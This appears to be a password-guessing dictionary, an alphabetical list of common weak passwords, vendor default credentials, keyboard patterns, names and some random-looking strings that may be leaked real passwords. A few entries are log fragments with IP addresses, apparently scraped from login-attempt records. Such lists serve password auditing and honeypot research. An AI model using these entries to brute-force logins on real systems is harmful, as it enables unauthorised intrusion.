IBM-oa-wsj
IDC2014
IDC2015
IDCSEO2009
INTX3
ITF3000
Idc@123
Iforg0t
Iloveyou
Internet
Is$uper@dmin
Isabella
Isoidc@isoidC123
ItiDauMuie
J&eg326%fdgwhewaggffdaeu3FfdgwygFD53
J34a47nu
J4+\\m8@RN6?=/af=
J@bf*n71Bc2
JDE
JH12090566
JaMqwdasdasnUASDHASDAS
Jacob
Jana
Jarrett
Jaycob
Jaycob123
Jbmeiyoua
Jimmie
JoewrIuG9U4i8siabROa
JokeandNashtuHackeri4on
Jors110
Juan
Khuc
Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD
Kibosy1227
Kii76ghagtnbhA
Komerikke
KumoAdmin
L0dg1st1cs!
LALALAOWUEURYTYKSMDJFHF
LANDUI@KVM6
LOTUS
LX4yYyepcj@8X/%!
Liam
LinuxRNS
Liteon81
LittleBoywEqF5bU37
Liv3jAsMiN3c00l
Lizzie
Lodgis2015tics
Logan
Logan1
LogiN
Login
LrXIp03SY1yD
M0r!@nt0n
M1314520
MAIL
MANAGER
MANAGER.SYS
MASDNNASBDABSDBASBDASBDBASBD
MEGADIA
MGR
MGR.SYS
MIMI
MK08ta%*
MPE
MServer
MYSQL_ZKEYS
Madison
Marco
Mario1234Mario
Mason
Master
Mau'dib
Meter
Mia
Mima
MirelaGeorgeAna
Monkey
MySQL
Mylittlerunaway
N0th1n9
N6a4t4u8OEwiaW8i7HLaqLaki
NAU
NETBASE
NETWORK
NICONEX
NM1$88
NU-E-BUN
NUEBUN
NUEBUNAND
NUIbunROOTUL
NetVCR
Network
Network   
New
Noah
Nomovok
NotReal
November
NpointHost
NuEbUN
OCS
OP.OPERATOR
OQ5iS5jcohZ
ORACLE123
Olivia
Opendoor2013
Operator1
Overton
P4$$w0rd
P4ssw0rd
P:?(OL>*IK<
P@$$123
P@$$w0rd
P@$$w0rd1
P@$$w0rd123
P@$$word
P@$$word1
P@55w0rd
P@55w0rd!
P@55word
P@SS,./123
P@SS123
P@SS1234
P@SS147258
P@SS147258369
P@SS258369
P@SSWORD
P@ss,./123
P@ss123
P@ss1234
P@ssW0rd
P@ssw0r
P@ssw0rd
P@ssw0rd!
P@ssw0rd..
P@ssw0rd1
P@ssw0rd1!
P@ssw0rd12
P@ssw0rd123
P@ssw0rd1234
P@ssword
P@ssword!
P@ssword1
P@ssword123
P@ssword2
PASS!
PASS,./123
PASS123
PASS147258
PASS147258369
PASS258369
PASSW0RD
PASSW0RD123
PASSWORD
PASSWORD123
PASSword
PBX
POSTGRES
PRODDTA
Pa$$s0rd
Pa$$w0rd
Pa$$w0rd!
Pa$$w0rd1
Pa$$word
Pa55w0rd
Pa55word
Pa55word2011
PaSsWoRd
Pablo
Pages123
Pass,./123
Pass1234
Pass@word
PassSch00l
PassWord
Passw0rd
Passw0rd!
Passw0rd1
Passw0rd123
Passw0rd1234
Passw0rd@123
Passwd1
Password
Password!
Password01!
Password01!cdnadmin
Password1
Password12
Password123
Password123!@#
Password1234
Password1[74.208.170.226]: 
Passwords
Passwort
Peer123
Penguin
PeqNwaaY
Pf0t3nw3g
PiRoPoPiRcAnItA0123456
PlcmSpIp
PlcmSpIp123
PlcmSplp
PlsChgMe
PostgreSQL
Pr99*35a!ra-EwruvU3E@rAtUk
Pyedu3000,server
Pyedu3000.server
Q!A@Z#
Q!W@E#R$
Q1314520
Q1W2E3R4T5Y6
Q1w2e3r4e
Q1w2e3r4t5
QAZ!@#123
QAZ@WSX#EDC
QAZWSX123456
QAZwsx!@#
QAZwsxEDC
QETUOADGJLZCN,
QQQAAAZZZ
QQQWWWEEE
QQaazz
QT3CUCCj
QWASZX
QWE!@#
QWE!@#123
QWE123
QWE123!@#
QWE123456
QWE123_!@#
QWEASD!@#
QWER1234
QWER12345
QWER4321
QWERTY
QWE_123!@#
QWEasd
QWEasd!@#
QWEasd123
QWEasdZXC
QWErtyuioP
QWW
QWer!@34
QYWL
Qaz123wsx!@#
QazWsx123
Qazwsx
Qq123456
Qq1234567
Qq12345678
Qq654321
QwErTy
Qwe!@#
Qwe!@#Qaz
Qwe123!@#
Qwe123456!@#$%^
Qwe123Abc
Qwe123_!@#
QweAsdZxc,./
Qwe_!@#123
Qwer.123
Qwer1234
Qwert!@#$%
Qwert12345
Qwerty
Qwerty!@#$%^
Qwerty12
Qwerty123
Qwerty12345
Qwertyuiop
Qwsx000#
R6jT6kfs
REGO
REMOTE
RFVFPcenhf1277
RIP000
RJE
ROBELLE
ROMANIA
ROOT500
RSX
Rackspac
Rackspace
Radiant
Radore
Radore123
Radore1234
Rdkrk6ljBKTl
RedHat
Rh3I5Lik3P4rtY@@@v3rmagnnumm
Richard
Rjkj@free7248#8
Rjkj@free7248#8 
RmYXDqhZCngu
RooT
Root
Root123
Root123456
Root@123
RootHaoHanData@601
RyL33R!`["L@%/+(0)!"L$%$-0%0mOOM`/%/!!iMhaK3r#]
S#d885fk9981
S4kur4
S@o3l
S@o3l vm4cn!tv
S@o3l1
S@o3l123
S@o3l1234
SBTzmbz11
SCDNShangHai
SD2lignj3jgW
SDF#$d567dsQEW
SECURITY
SERVICE
SESAME
SNSOFT
SQL123456
SSA
SUPPORT
SYS
SYSTEM
Sabyn.users.undernet.org
Sakura
Sakura1
Sakura123
SakuraVPS
Scpchina
Sekip333#
Server
Server2008
Service__9
Sh3I5Lik3P4rtY@v3r
Sh3ILi5k3P4rtY@v3r
Shane
Shell
Shop
Sofia
Sophia
SpAd!e-8
SpIp
Speed
SpiderMan
SpryTechOnly2006
StarHub123
States
Superman
Symantec
System123
System123!
T4KBt0Xk
TCH
TELESUP
TJM
TMA1100@kg
TZ123445
TangKe*80231314
Test
Test123
Test1234
Test@123
Texas
TiganilAFloriNTeleormaN
Tigo2013
Tigo2016$
Toshiba
U8jr$(km
UI-PSWD-01
UI-PSWD-02
UTCfs2202
UTENTE
Ubuntu
Unicom_nb
Uq-4GIt3M
User
User@123
VESOFT
VZUilm6vVcPf
Vayam@4523svn
Vextrex
ViaWest
Viet
W1314520
W3jZZvIfKFvU
W9YnNoEdPc
WCjz3Fi8ykyqXf
WEB!@#
WORD
WOaini
WPD800-i5zyt-yvwbp-75fsa
WWW.123.COM
WWW.126.COM
WWW.163.COM
WY#Y^&Y*#&*#
Wangsu123!@#
Warehouse1
WebBoard
Welcome
Welcome1
Welcome123
Welcome123!
Welcome@123
WggZfxq2
Win2003
Wkoz949#
WorldDomination
WpCt&6br.Pp
WrIaRoeThIespOeh3AwriufLetiu7Tlu11u
Wrere455
Www17161u1
Www17161ui
Www17161ui1
Www17161ui123
Wwwu1
Wwwui
Wwwui1
Wwwui123
X1314520
XCyz#xcyd
XIAOyuan19788e
XJ050I7bfA
XK(025)uma
XLSERVER
Y4yhl9T
Y4yhl9T@123
Y4yhl9t
YCm-w0-U
YESH0m3l4b1t
YHNMJU&*IK<
Z!A!Q!
Z1314520
ZAQ!2wsx
ZAQ!@WSX
ZAQ!@WSXCDE#
ZAQ!XSW@CDE#
ZAQ!xsw2
ZAQ12wsx
ZGjyc6Jazr37AQA4FXHEbzDyu
ZJdx_cnc_huawei
ZTE!@#$%^&
ZTE@OS+10
ZU4HLJFWKLZ8M8BNG6DRH5GS
ZXC!@#ASD
ZXCASD!@#
ZXCVB
ZXCVBNNM
ZXCasdqwe
ZXZXZX
ZZZ
Zh31SL1K3parTyOv3r
Zhen123
Zmeu
Zxc!@#
ZxcAsdQwe
[admin
[castravete]
[firewall
[loler11q
[n0rd574r]
[realmadrid]
[url=mailto:!@#$%]!@#$%[/url]^&*
[url=mailto:!@#$]!@#$[/url]
[v3v3r1t4]
][';/.
]r+8:2`TgVV~uD6f
^%$#@!
^%^%$^%
^YHNnhy6
^yhn
_
_+{}"|
_{"+}|
`!@#qaz
`!@#qwer
`123!@#
`12345
`123456
`1234567890
`1234qwer
`123abc
`123abc,./
`123asd!@#
`123qaz!@#
`123qwe!@#
`123qwer
`123~!@#
`1q2w3e
`1q2w3e4r
`1q2w3e4r5t
`qazwsxedc
`qweasdzxc
a
a
a!b@c#
a!b@c#d$
a.123
a.321
a.kurbatov
a0.418.0a
a1
a10n
a112120c
a123
a123.123
a123.123.+
a123.321
a123123123
a1234
a12345
a123456
a123456!
a123456+
a1234567
a12345678
a123456789
a12345678999
a123456a
a123456b
a1314520
a147258
a147b258c369
a1a1a1
a1a1a1a1
a1a2a3a4a5
a1b2c3
a1b2c3d4
a1b2c3d4e5
a1b2c3d4e5f6
a1on
a1s2d3
a1s2d3f4
a1tiba$e
a23xxx
a2a2a2
a2a2a2a2
a321.123
a321.321
a3da50fb67a6ae5a06eca1364e2356a9
a5201314
a5740456
a6c543c17fdd01439ff37f345a039992
aDmin123
aVuu835&
aW5nIEluroot
aa
aa123
aa123.com
aa123123
aa1234
aa123445
aa123456
aa1234567
aa12345678
aa5201314
aa641969696
aaa
aaa.123
aaa111
aaa123
aaa123!@#
aaa123*()
aaa12345
aaa123456
aaa222
aaaa
aaaa1111
aaaaa
aaaaaa
aaaaaaa
aaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaabbb
aaabbb.+
aaaidc.com
aaazzz
aabbcc
aapache
aaron
aaron123
ab1230.
ab123456
ab2772
ababab
abarisic
abba
abbott
abby
abc
abc!@#
abc!@#123
abc!@#456
abc#123
abc-123
abc.123
abc.123456
abc1
abc111
abc123
abc123!@#
abc123!@#$^
abc123$%^
abc123$%^&
abc123,./
abc123.
abc123.+
abc123..
abc123..+
abc123...
abc123.123
abc1230.
abc123123.
abc123123a
abc123321
abc1234
abc12345
abc123456
abc123456+
abc123456.
abc123@
abc123a
abc123abc...
abc@123
abc@1234
abc@123456
abcABC123
abc_!@#
abc_!@##@!
abc_0123456789
abc_123
abc_123!@#
abc_123#@!
abc_123$%^
abc_123...
abc_1230.
abc_123456+
abc_2015
abc_def
abcabc
abcabc123
abcabcd
abcabcd1234
abcabcd1234%^&*
abcd
abcd!@#$
abcd+1234
abcd-1234
abcd.123
abcd.1234
abcd.com
abcd123
abcd1234
abcd1234 
abcd1234!@#$
abcd1234%^&*
abcd12345
abcd123456
abcd@123
abcd@1234
abcde
abcde!@#$%
abcde12345
abcdef
abcdef123456
abcdefg
abcdefgh
abcdefghi
abcdefghij
abcdefghijk
abcdefghijkl
abcdefghijklm
abcdefghijklmno
abcdefghijklmnop
abcdefghijklmnopq
abcdefghijklmnopqr
abcdefghijklmnopqrst
abcdefghijklmnopqrstu
abcdefghijklmnopqrstuvwx
abcdefghijklmnopqrstuvwxy
abcdqwe
abcs
abdul
abdulloev
abe
abel
abencek
abencek123
abhay
abhay123
abhishekb
abhishekb123
abhishekb@123
abigail
abiko
abiko123
abilusic
abilusic123
abitcool
abo
abo+_~!fhdZllffZZmm
abojanic
abojanic123
aborodin
abozic
abozic123
abozinov
abozinov123
abraham
abratic
abril
absolom
aburin
abuse
abuskulic
abuskulic123
abwook
abwook123
abys
ac1ff3750cb1a60a561af107a6dfec2a
ac1ff3750cb1a60a561af107a6dfec2a1
ac_env_build_alias_set
acabrilo
academia
academic
acajko
acc
acc3ssm3
accel
accept
acces123
access
accessdenied2010
account
account123
accounting
accounts
accounts123
ace
ace123
ace@123
acelife
acer
acer4920g
aceraspire
ache
achim
acontorno
acp
acrinis
acrinis123
acs
activemq
acton
acul
aculacul
acurkovic
acustov
acx_123
ad!@#$%^
ada
adachi
adachi123
adad!@#
adad1212
adah
adalbert
adam
adam123
adamina
adanilov
adapo
adapo123
adapter
add
addicted
addison
addo
address
ade
adela
adela123
adelaide
adelbert
adele
adelheid
adelina
adeus
adfexc
adi
adi123
adidas
adidas123
adin
adina
adine
adita
adm
adm123
adm1234
adm1n
admax5543
admi
admi123
admim
admin
admin     
admin        
admin G
admin!
admin!@#
admin!@#$%
admin!@#$%^&*()
admin!@#1
admin!@#123
admin!@#456
admin!@#admin
admin$
admin$123
admin+
admin-123
admin.123
admin000
admin001
admin007
admin00789
admin01
admin02
admin03
admin1
admin1+
admin111
admin12
admin123
admin123 
admin123  
admin123!@#
admin123#
admin123# 
admin1231
admin1234
admin1234 
admin1234       
admin12345
admin123456
admin1234567
admin12345678
admin123456789
admin123admin123
admin123qwe
admin1314
admin1qaz
admin1qaz2wsx3edc
admin2
admin2010
admin2014
admin234
admin3
admin32
admin321
admin321321
admin5.com
admin520
admin5idc
admin75
admin78
admin88
admin888
admin999
admin@
admin@123
admin@123 
admin@1234
admin@12345
admin@123456
admin@2014
admin@321
admin@888
admin@888888
admin@admin
admin@root
admin@txt
admin_1
admin_123
admina
admina373045462
adminadmin
adminadmin222
adminadmina
adminadminadmin
admincpto
admini
adminidc
adminis
adminisc
administrador
administrateur
administrato
administrator
administrator123
adminlinux
adminnji
adminpass
adminqwe
adminqweasd
adminroot
admins
admintest
adminttd
adminuser
adminz
adminzhaoxin
admip
admissions
admissions123
admknks
admln
admn
ado23t07oasidas
adolf
adolfo
adolph
adonai
adonia
adora
adr1an
adrian
adrian123
adrian1234
adrian140489
adrian321
adriana
adriana1981
adriano
adrien
adrienne
adrina
adslolitec
adslroot
adtran
adunare
adv
advert
advsoporte123
adynebunu
aerohive
afairfax
aff123
afr
africa
after
against
agata
agatha
agathe
agatin
age
agent
aggie
agilbert
agnes
agoetz
agostino
agsadmin
aha
ahmed
ahmed123
ai0n
aida
aiden
aikido
aiko
aine
aini130.
aion
aion123
aion1234
aion12345
aion123aion
aion321
aionaion
aionaion123
air
aircop
airplane
airport
aisha
aix
aixunuo520
aixunuo520..
aj
aj-web
aja
ajackson
ajax
ajay
ajay123
ajay@123
ak
ak123
aki
akia
akikg0p9
aklunok
akos
akotina
akozlov
akuo
akushnikov
akustov
al
al3c5ander
al3x
alain
alaina
alan
alan220lee
alana
alannis
alarm
alastair
alb
alba
albert
albert123
alberta
albertinoalbert123!!
alberto
alcatel
aldo
alec
alecia
alejandro
alek
aleksander
aleksandrov
alekse
alenk
alenka
aleon
alessa
alex
alex1
alex123
alex1234
alex12345
alex123alex
alex321
alex@123
alexa
alexander
alexandra
alexandre
alexandro
alexandru
alexe
alexia
alexis
alexl
alexxutzu1$@121
alfonso
alfred
alfred1
alfresco
alges
alhalla
ali
alias
alias123
alice
alice123
alice@123
alicia
alienware
alig
alin
alina
alinus
alison
alissa
alistair
aliza
alka
all
all123
all321
allan
allen
alliance
allison
allmighty
allo
ally
almacen
almir
alo
alok
alok123
alok@123
alone
alpha
alphonse
alpine
altibase
altibase123
altibase@123
alumni
alumni1
alupigus
alvaro
always
alx123alx
aly
alyn
alyssa
am
amadeus
amadora
amal
aman
aman123
aman@123
amanda
amanda1
amane
amant
amanta
amar
amark
amavisd
amazon
amazona
amazona123
amazonaws
amazonaws123
amber
amber123
amberly
ambrose
ambulator
amelia
amelie
amenic
america
american
amerino
amex
ami
amir
amit
amit123
amit@123
amol
amol123
amrita
amsftp
amssys
amssys123
amssys@123
amsys
amy
an
an0th3rd@y
ana
ana123
anacondaexx123
anaesthesie
anakin
anastacia
anastasia
anca
anca123
ancuta
ancutza
and
and 2000 Series
anda
anders
anderson
andi
andie
andor
andra
andras
andre
andrea
andreas
andreea
andreev
andrei
andres
andrew
andrew123
andrey
andreyd
andy
andy123
ane
anemone
ang3l
ange
ange1
angel
angel123
angel1234
angel321
angela
angelique
angellinetong
angelo
angelo123
angelqwe1233210768427185
angie
angola
angry
angus
anicust
anil
anil123
anita
ankit
ankit123
ankit@123
ankur
ankur123
ankur@123
ann
ann4
ann@
anna
anna1
anna12
anna123
anna1234
anna2012
anna321
annaanna
annabel
anne
anne123
annelise
annette
annick
annie
annie1
annie12
annie123
annuaire
anon
anonimus
anonymous
ans
ans#150
ans123
ansible
anstacia
answer
ant
antena
anthony
anthony123
anthony@123
anti
antica
antique
antje123
antoine
antoinette
anton
anton123
antonia
antonie
antonio
anudeep
anudeep123
anudeep@123
anup123
any@
anya
anypass
ao
aolivari
aozt
apa
apaajaboleh
apache
apache!svn
apache1
apache12
apache123
apache1234
apache12345
apache123apache
apache2
apache2svn
apache321
apache@123
apache@svn
apassword
apate
apc
apero
apocalipsa
apocalipse
apoi
apollo
apoulain
apoulain123
apoulain@123
app
app123
app321
apparent
appetit
appl3
appldev
apple
apple1
apple123
apple@123
applications
applmgr
applmgr123
applmgr@123
applprod
applprod123
applprod@123
appltest
applvis
appowner
apps
appserver
appsvc
april
aptproxy
aptx4869
aq1sw2
aqswde
aqswdefr
aquaearth
ar
arabela
arad
arazumovsky
arbeit
arc
arch
archer
archie
ardei
area
aretha
areyes
arfarf
argus
ariana
ariane
arieta
arij
arij123
arlene
armand
armande
armando
armani
armaserver
armen
arnie
arnold
aron
around
arpanet
arrow
art
arthur
arthur123
articon
artie
artifactory
artifactory123
artifactory@123
arty
aru
arul
arul123
arul@123
arun
arun123
arun@123
arvind
as
as123456
as4246
as5c41sdsa
as6394
asante
ascend
asd
asd!@#!@#
asd!@##@!
asd.123
asd123
asd123!
asd123!@#
asd123,./
asd123.
asd123..
asd123.0
asd123.a
asd1230.
asd123333
asd1234
asd12345
asd123456
asd1234567
asd123asd
asd1zxc2
asd2099
asd@
asd@123
asd_123
asd_123,./
asdasd
asdasdasd
asdasdfghjkl
asdf
asdf!@#$
asdf!@#$1234
asdf.1234
asdf12
asdf123
asdf1234
asdf1234!@#$
asdf1234%^
asdf1234%^&*
asdfasdf
asdfdsa
asdfg
asdfg!
asdfg123
asdfgh
asdfghj
asdfghjk
asdfghjkl
asdfghjkl09*&^%$#@
asdfghjkl123
asdfghjkl;
asdfghjkl;'
asdfghjkl;'\\
asdfghjklqwertyuiop
asdfghjklzxcvbnm
asdfgqwert
asdfjklhfgh
asdfqwer
asdfzxcv
asdfzxcvbnm
asdqwe
asdqwe!@#
asdqwe123
asdzxc
ase4
asha
asher
ashish
ashish123
ashish@123
ashley
ashok
ashok123
ashok@123
ashton
ashutoosh
asia
asian
ask
ask123
ask@123
aslpls
asmeja
asp
asp123
asp1234
aspire
aspnet
ass
asshole
aster1sk
asterisk
asterisk1
asterisk123
asterisk1234
asterisk123asterisk
asterisk321
asteriskftp
asteriskpbx
asteriskpbx123
asteriskpbx1234
asteriskpbx321
astra
astral
astrid
astro
asus
asztal
at
at4400
atai
atb
atena
athena
atlantis
atm43961aa
atolstikov
attachments
attack
audio
audrey
augusta
augustin
augustus
aur
aure
aure123
aure@123
aurel
aurelia
aurelian
aurica
aurora
auschwitzs5feldtbatalion
ausslander
austin
austria
autoemar
autograph
av.com
av3873
av7112
avahi
avahi-autoipd
avalon
ave
avel
avenues
avon
avonline
avrille
avto
avtosclad
away
awd445m3jjl
awdlijzxmn
awstats
awt
ax111111
axel
axente
axgt14ie
axl
axsel89
ayden
az
azerty
azolotaryov
azsxdcfv
azureuser
b
b#5rum$ph!r!Keyufawre?a3r6
b0
b123
b2magain
b3n
b8ec3103f05c47b34759672a3fa14bf4
b8ec3103f05c47b34759672a3fa14bfewrt
b8ec3103f05c47b34759672a3fa14bfewrtsssssssssssssss
b@ckup
bH1GILNPZIFb
bUspamaxegEGuyU52PEt6estU
bZnaFUmu
ba
baba
babadelacolt
baby
baby520
babyboy
back
backdoor
backdrop
backspace
backtrack
backtrack5
backup
backup123
backup1234
backup1FNET
backup321
backup;backup
backuppc
backups
bacon
bacula
bad
badboy
badea4oradea
badman
bagabu
baggio
bagpulainmataba
bagpulaintineadmin
baiat
baidu
baidu.com
bailey
balan
bali1234`
balin
balinez
balinez123
balinez@123
ball
balloon
balthasar
bambi
ban
banana
bananapi
banat
bandwitch
bane
bang
bangbang
bani
bank
banner
banner123
banza45
banzhong
baofeng
baomi
bar
barak
barb
barbara
barbie
barbra
barc3lona
barcode
barman
barney
barny
baron
barricade
barry
bart
barth
barton
baseball
bash
bash123
basic
basket
basketball
bass
bass123
bastan
bastard
bastard.ro
bastian
bat
batman
battlefield
battlefield3
battlefield4
bauer
baxter
bb
bb123.com
bb123456
bbb
bbb123
bbbb
bbbbbb
bbernhar
bciimpw
bcimpw
bcmspw
bcnaspw
bd
bd@code13611693775
be
bea
beach
beacon
bear
beast
beatrice
beatriz
beautiful
beball
bebe
bebelus
because
beck
becker
beckerj
bed
beep
beer
beethoven
beierl
beijing
beijing!@#$
beijing2015
beijingbeijing2008
bela
beleaua
believe
belinda
bella
belly
ben
ben123
ben1234
ben321
benedict
benedikt2011
benesch
benites
benjamin
benny
benson
bent
bentley
beny
benzina
berg
berger
bernard
bernd
bernhar
bernhard
bert
bertha
berthold
beshi
best
bestway33
beth
beto
better
betterprotect
bettina
betty
beverly
beyonce
bf2
bf3
bf3server
bf3user
bf4
bf4server
bf4user
bflt
bfserver
bgfdl
bhlee
bhunjimkolp
bi
bia
bianca
big
bigboss
bilindsay
bill
billftam
billin
billing
billw
billy
billy123
bin
bind
bintec
bios
bird
bird2
birdbird
birmingham
birth
bitnami
bitrix
bitrix24
biuro
bj123445
bj12345
bj123456
bj123456!@#$%^
bj1234567890
bj123654
bjpark
bjwangluo
bkm
bl3rand,.
black
black123
blacker
blackhat
blackops
blackops2
blacktrack
blake
blank
bleCroujouwLUswOEdrlAfo6w
blender
blinov
blog
blogs
bloom
blue
bluepw
bluesf2005
bluesky1981
blåhajk
bm3528
bmp
bmp123
bmsuser
bnc
bnet
bnja37
bnn
bnn123
bnn5
bnn@123
bntvmstc1
board
bob
bobby
bobby123
bobolito123
bobrov
bocans1982
bodhilinux
bogo
bogo123
bogomips
bolkestein
bonck.cn2011
book
books
boot
boot123
bootboot
booter
boris
borisov
bos
boss
boss123
bostanel
bosto
bostoaca
bostocel
bot
bouygtel
bowman
bowmna
boygril
boys
bpeddineni
bpeddineni123
bpeddineni@123
br3ack0ff
brad
branburica
brandon
brasil
brayden
break
brenda
brendan
brent
brett
brian
brian123
brian@123
brigitte
brody
bronze!@#456
browse
browsepw
browser
bruce
bruteforce
brysjhhrhl
bscw
bsd
bsimzer
bsnl
bssbss
bssh
bubulinared123
bucharest
budget
budget123
budget@123
budgie
bug
bugs
buh
buhg
buhgalter
buienradar
build
build123
builder
builduser
built
bulidbot
bus
business
butterfly
bux
buxing
buxing11111
buxinga 
buxingg
buy
buzhidao
bwadmin
bwadmin123
bwadmin@123
bworks
bx14
by
bykov
byte
bytes
byu
byu123
byx
bz3e!vq3jK
bzw
bzwb89
bzwbpa
c
c00p3r
c0mput3rsyst3m
c1zb09
c30ce61
c67ic8
c6em3b
c7hu1hu
cQiroxm4UKOl
cW446FX9
caca
cacaciosul
cacadmin
cacaserver
cacti
cacti123
cacti@123
cactiuser
cactiuser123
cactiuser@123
cai
caidobrazil
caitlinax123
caiwei
caleb
california
calvi
calvin
calzado
calzado123
camden
cameron
campus
can1dace
canada123
canayplastic
canon123
caonima
caonima!@#
caonima,./
caonima.com
caonima123456
caonimade
cap
caps
capslk
car
cardemis1
carina
carl
carl123
carla
carla123
carlcarl
carlos
carmen
carol
carolyn123
carson
carstent
carter
carto0ns11
cash
cashier
casino
cat
catadmin
catalog
catherine
cbaabc
cc
ccc
cccc
cccccc
cch
ccrusr
cde1vfr2
cde3@WSXzaq1
cdexswzaq
cdnadmin
ceadmin
cebron
ceckspamroot
cedric
ceilometer
cele
cele123
celery
celes3cat
celine
celine123
celinepc
centos
centos123
centos2015
centos5svm
centos6svm
centos7svm
centos@123
central
cert
cesu
cgadmin
cgi
ch
ch4ng3m3
ch4ng3th1s
ch4ngem3
chacon
chad
chad123
chandimal
chandru
chandru123
chandru@123
change
changeme
changeme!@#
changeme123
changeme2
changeme_123
changethis
chaonimabi123456123
charcoal
charles
charles123
chase
chat
chat123
che
che123
che@123
cheater
cheater123
cheater@123
check
check2
checkcheck
chemistry
chengnuo52
chengnuo520..
chenguihua18823783359huangben
chenj
chiara
chicago
chick
china
china!@#2011
china.com
china123
china123!@#
china123love!@#
china123qwe
china127idc
china35
china999IDC
china@123
china@2000
china@888
china@admin
china@china
chinaasp
chinabeijing
chinacCOM1qaz0okm
chinacache
chinacom
chinaidc
chinaidc35.com
chinanet
chinanet0525zrz
chinaserver
chinaz.com
chinese
chinon
chip chip
chirag
chkengine
chobits
cholet
chorist
chouji
chris
chris123
christian
christoche
christopher
chromosphere
chuan
chuck
chuna20c
cicciabuatta1
cilbup
cindy
cinema
cinema123
cinema2
cinemacinema
cisco
cisco123
cisco123456
city
ckl
clIPA07
clLgN08!
clSonus08!
clTas08
clamav
clang
clasic
class
claudia
cleanempire
clear!@#
clearmode
clec.com
cleopatra
clerk
clfs
clicker
clicker123
client
client1
clinic
clngc07!
closas
close
cloud
cloud123
cloud2012
cloud@123
cloudinc
clovis
clovisaffirmed
cluster
cm8158
cms
cms123
cms500
cmsftp
cmsftp123
cmsftp@123
cnap
cnc
cnc123
cndskashdtkfkd
cnkicnki
cnlink-sh
cnlinkadminsh
cnv
coco
cocosmecheru
cod
cod123
cod2
cod2stats
cod2stats123
cod2stats2
codaw
codcod
code
code123
code2
codecode
codename
coder
codeword
codmw
codmw3
coffee
cokes
cokes123
colar3g3l3
collins
cologno123
colord
colour
colton
com
com1
comcast
comercial
commander
commandes
commando
common
common123
common@123
commsoft
commun
community
company
compaq
compas
computer
computer.
computer1
computer12
computer123
computer1234
computer12345
computer123456
conference
config
confussion
connect
connor
constantine
consul
contabilidad
contact
contactcs
contactus
content123
contos
control
control123
controlling
cookie
cool
coop3r
cooper
cop
copier
copypastestuff
core
coremail
cornitor
cornitor123
cornitor@123
coruption
cosmin
cosmos123$
couchdb
counter1
coupon
courier
cpanel
cpter1
cqindex
cqzr
cr1st1na
cr4zyd3m0n3v3r
cr7kco10^6@
crack
craft
craftpw
crao
cream
create
creparola123parola123tzu
crftpw
criminalul1979
criss
crista99
cristina
crom
crom123
crom@123
cron
crystal
cs321
csadmin
csgo
csgoserver
csgouser
csm
csrf
css
cssadmin
csserver
cssserver
cssuser
cst
cstrike
csuser
csx
ctj3kk3l
cube
cubie
customer
custpw
cutiacusurprize
cutit1985
cutitas1985
cvicse
cvs
cvs123
cvsadmin
cvsadmin123
cvsadmin@123
cvsroot
cvsuser
cvsuser1
cwt
cxz123
cxzdsaewq321
cyber
cyber123
cybercyber
cyriacks
cyrus
cyrus123
cyrus1234
cyrus2
cyrus321
cyrus@123
cyruscyrus
cyrusimap
d
d.pantishin
d/5*1-4+,e18
d0rkslayer23
d1ablo
d3b1an
d3bi@n
d3lt4123
d3lt4f0rc3
d3pl0y
d3pl0y3r
d3pl0yer
d3ploy
d3ployer
d3v
d3v3l0p3r
d3v3lop3r
d3v3loper
d3vel0p3r
d3vel0per
d3velop3r
d3veloper
d4ni3l
d4rthv4d3r
d5aJ0SVI7Kal4X4b
d5gJhfHBfhgBcBNvcsgh6&f
d@n13l
d@n1el
d@ni3l
d@niel
dTpj8mDLL!
da91aba6e319cb467cbce6b418170523
dabestmouse
daemon
dage
dale
dale123
damri123
dan
dan1el
dan611024
dance
dance4life
danduxxl
danger
dani
daniel
daniel123
daniel1234
daniel2012
daniel2013
daniel321
daniela
danielle
danielsm300385
danihack123
danil
dank
danny
dante9pac
danytzue31989
daocaor.com!@#
dariaalinamisu123
dark
darkman
darkmaster
darknes
darunee123
darwin
dashenglinux.
dashuai
dasusr
dasusr1
dasusr1123
dasusr1@123
data
data123
database
database123
date
dav
dav1d
dave
dave123
david
david123
david1234
david321
dayz
db
db1h8r4ty
db2
db2admin
db2das1
db2fenc
db2fenc1
db2fenc2
db2fenc3
db2inst
db2inst1
db2inst1123
db2inst123
db2inst1@123
db2inst2
db2inst3
db2inst321
dbus
dbuser
dbusr
dbusr123
dbusr@123
dc
dc123
dc@123
dcrfv
dd
dd9127
ddd
dddd
dddddd
dddos
ddo
ddos
ddweew23
de
dean
dean123
dean1dean
death
deathfromromaniansecurityteamneversleepba
debbie
debian
debian123
debian1234
debian321
debug
dedeteyubesc
dedicat
dedrick
dee
dee2007
default
defaultpass
delete
delibare1982
dell
delphine
delta
deluge
deluxe33
deme
deme123
demo
demo123
demo2
demoadmin
demoadmin123
demoadmin2
demodemo
demos
demotest
demotest123
demotest2
demouser
demouser123
demouser2
den
den123
denied
denis
dep1oyer
depl0y
depl0y3r
depl0yer
deploy
deploy!@#
deploy1
deploy123
deploy1234
deploy12345
deploy123456
deploy123deploy
deploy321
deploy@123
deploydeploy
deployer
deployer123
deployer1234
deployer123deployer
deployer321
depsite
depuse
depuse123
depuse@123
der
derek
derek123
derek123456
desaster
desdevqwe123
design
designe
desktop
destiny
detekve
detekve123
detekve1234
dev
dev123
dev1234
dev12345
dev321
dev3l0p3r
dev3l0per
dev3lop3r
dev3loper
dev_password
devdata
devel0p3r
devel0per
develop
develop[218.201.70.109]: 
developer
developer123
developer1234
developer321
device
devil
devil123
devilsins
devserv
dezso
dff
dfk
dfk123
dfk@123
dfkljsd
dfreeman
dghY#%#534
dgsgsdgsad
dhcp
diablo
diablo2
diablo3
diak
diak1
dialfaromeo
dialup
dialup123
dialupdialup
diamond
diana
diana123
diana4ever
diane
dianxin10000
dico9984245
diego
diella123
diethelm
diffie-hellman-group-exchange-sha1
digital
digital123
digitalchina
dima
dimension
dino
dino1
dinosaur
dinozaur
dionis
dir
dir.leja
dir.liener
dir.reiter
director
direktor
disasterbot
disasterbot123
disasterbot@123
disk,./1234
disney
disney123
displays
div
divad
divine
division
divya
divya123
divya@123
djalin24
django
djs95399yww
dkw.com
dkw12345
dl
dl2000
dliga
dmin
dmitriev
dmitriy
dms
dn
dn123
dn@123
dnion
dnjstjfgml2
dns.com
dnsii2010
dnsii2015
dnsii2016
doc
doclerweb
doctor
doffmok
dog
doimaiomienouasuteoptzecisicinci
domain
domin
dominic
domino
don
dong222
dontxekme
doodz
door
dorin123456dorin
dorin12345Dorin
dorin12345dorin
